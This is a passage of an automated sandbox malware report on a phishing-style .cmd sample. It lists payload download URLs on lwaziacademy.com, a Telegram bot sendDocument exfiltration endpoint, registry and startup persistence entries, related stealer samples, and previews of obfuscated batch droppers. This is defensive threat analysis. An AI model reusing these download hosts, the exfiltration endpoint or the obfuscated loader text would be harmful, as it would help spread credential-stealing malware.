                                                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://lwaziacademy.com/wps/200x.exe, 00000004.00000002.2212967585.000000002090D000.00000004.00001000.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://lwaziacademy.com/Hx.exe, 00000004.00000002.2175552195.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://reallyfreegeoip.org/xml/8.46.123.189lMicrosofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://checkip.dyndns.comdMicrosofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://aka.ms/pscore6lBpowershell.exe, 0000000B.00000002.2304962068.0000000004331000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crl.microbpowershell.exe, 0000000B.00000002.2417126655.0000000006E8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://checkip.dyndns.org/qrpkhzpuO.pif, 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://contoso.com/powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://lwaziacademy.com/wps/200_Oupzhkprnvwukx.exe, 00000004.00000002.2175552195.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://reallyfreegeoip.orgMicrosofts.exe, 0000000A.00000002.3379727606.0000000002A6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://checkip.dyndns.orgdMicrosofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.orgMicrosofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://checkip.dyndns.comMicrosofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://checkip.dyndns.org/dMicrosofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMicrosofts.exe, 0000000A.00000002.3379727606.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2304962068.0000000004331000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://ocsp.sectigo.com0Cx.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://api.telegram.org/bot-/sendDocument?chat_id=rpkhzpuO.pif, 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drfalse
                                                                                                  high
                                                                                                  http://www.pmail.com0x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173229317.0000000021F41000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173659376.000000007EC0A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241928880.0000000021FEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000002.2466353170.0000000020956000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000002.2601418278.0000000020836000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif.4.drfalse
                                                                                                    high
                                                                                                    https://reallyfreegeoip.org/xml/rpkhzpuO.pif, 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drfalse
                                                                                                      high
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      188.114.97.3
                                                                                                      reallyfreegeoip.orgEuropean Union
                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                      41.185.8.252
                                                                                                      lwaziacademy.comSouth Africa
                                                                                                      36943GridhostZAtrue
                                                                                                      193.122.130.0
                                                                                                      checkip.dyndns.comUnited States
                                                                                                      31898ORACLE-BMC-31898USfalse
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1582352
                                                                                                      Start date and time:2024-12-30 11:46:03 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 12m 3s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:36
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:PO_KB#67897.cmd
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winCMD@46/18@3/3
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 90%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 96%
                                                                                                      • Number of executed functions: 214
                                                                                                      • Number of non-executed functions: 65
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .cmd
                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target Trading_AIBot.exe, PID 3404 because it is empty
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      TimeTypeDescription
                                                                                                      05:46:53API Interceptor2x Sleep call for process: x.exe modified
                                                                                                      05:47:07API Interceptor20x Sleep call for process: powershell.exe modified
                                                                                                      05:47:11API Interceptor6x Sleep call for process: Oupzhkpr.PIF modified
                                                                                                      05:48:04API Interceptor531x Sleep call for process: apihost.exe modified
                                                                                                      11:47:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
                                                                                                      11:47:07Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                      11:47:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
                                                                                                      11:47:20AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.rgenerousrs.store/o362/
                                                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.beylikduzu616161.xyz/2nga/
                                                                                                      Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                      • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                      ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                      • paste.ee/d/lxvbq
                                                                                                      Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                      • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                                      PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                      QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                      http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                      • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                      gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                      • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                      Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • gmtagency.online/api/check
                                                                                                      41.185.8.252PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                        193.122.130.0MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        reallyfreegeoip.orgRequested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 172.67.177.134
                                                                                                        EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 172.67.177.134
                                                                                                        Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 104.21.67.152
                                                                                                        Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 172.67.177.134
                                                                                                        PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        checkip.dyndns.comRequested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        ZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                        • 158.101.44.242
                                                                                                        Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 193.122.6.168
                                                                                                        EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 193.122.6.168
                                                                                                        Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 193.122.6.168
                                                                                                        Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.8.169
                                                                                                        HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 193.122.6.168
                                                                                                        lwaziacademy.comPURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                        • 41.185.8.252
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        CLOUDFLARENETUSSupplier.batGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.144.225
                                                                                                        Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                        • 172.67.144.225
                                                                                                        NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.144.225
                                                                                                        Jx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 162.159.128.233
                                                                                                        Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 188.114.97.3
                                                                                                        http://i646972656374o6c6373o636f6dz.oszar.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.16.79.73
                                                                                                        GridhostZAarmv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 41.61.6.129
                                                                                                        3.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 41.185.108.101
                                                                                                        2.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 41.61.164.248
                                                                                                        1.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 41.185.180.246
                                                                                                        1.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 41.61.153.3
                                                                                                        2.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 41.185.108.111
                                                                                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                        • 41.185.133.158
                                                                                                        3.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 41.61.164.251
                                                                                                        ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                        • 41.61.164.233
                                                                                                        arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                        • 41.185.108.109
                                                                                                        ORACLE-BMC-31898USZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                        • 158.101.44.242
                                                                                                        INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 129.148.142.134
                                                                                                        Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 193.122.6.168
                                                                                                        splm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 129.147.168.111
                                                                                                        EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 193.122.6.168
                                                                                                        Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 193.122.6.168
                                                                                                        HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 193.122.6.168
                                                                                                        MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 193.122.130.0
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adRequested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 188.114.97.3
                                                                                                        EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 188.114.97.3
                                                                                                        PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        a0e9f5d64349fb13191bc781f81f42e1universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                        • 41.185.8.252
                                                                                                        Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                        • 41.185.8.252
                                                                                                        universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                        • 41.185.8.252
                                                                                                        6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 41.185.8.252
                                                                                                        lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                        • 41.185.8.252
                                                                                                        vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        • 41.185.8.252
                                                                                                        AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        • 41.185.8.252
                                                                                                        R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 41.185.8.252
                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 41.185.8.252
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        C:\Users\Public\Libraries\rpkhzpuO.pifAirway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                          Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                            RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                              Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                  D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                    qDKTsL1y44.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                      PRODUCT.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                                                        purchaseorder.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                                                          PO11550.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                            File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):8556
                                                                                                                            Entropy (8bit):4.623706637784657
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                                            MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                                            SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                                            SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                                            SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                                            Malicious:true
                                                                                                                            Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                            File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):46543
                                                                                                                            Entropy (8bit):4.705001079878445
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                                            MD5:637A66953F03B084808934ED7DF7192F
                                                                                                                            SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                                            SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                                            SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                                            Malicious:false
                                                                                                                            Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):679957
                                                                                                                            Entropy (8bit):7.4483963454083435
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:2H+NXHhlVBcqgRbPaltoM6OwLovLA/eimwQUaq3cF2ez06hNg+Ymnch:2qHX8RbyfovtLovLA/eim/ccF2ez06hO
                                                                                                                            MD5:25A482D7B6698E7666A523C910799F13
                                                                                                                            SHA1:18B17A1E14069E747F5076F97A9654D8D99E5ADA
                                                                                                                            SHA-256:4C1614F48CC1998B7E1F23C15AB0F0E2F4C9356EC05FF413FC5BE98D98EC8ACB
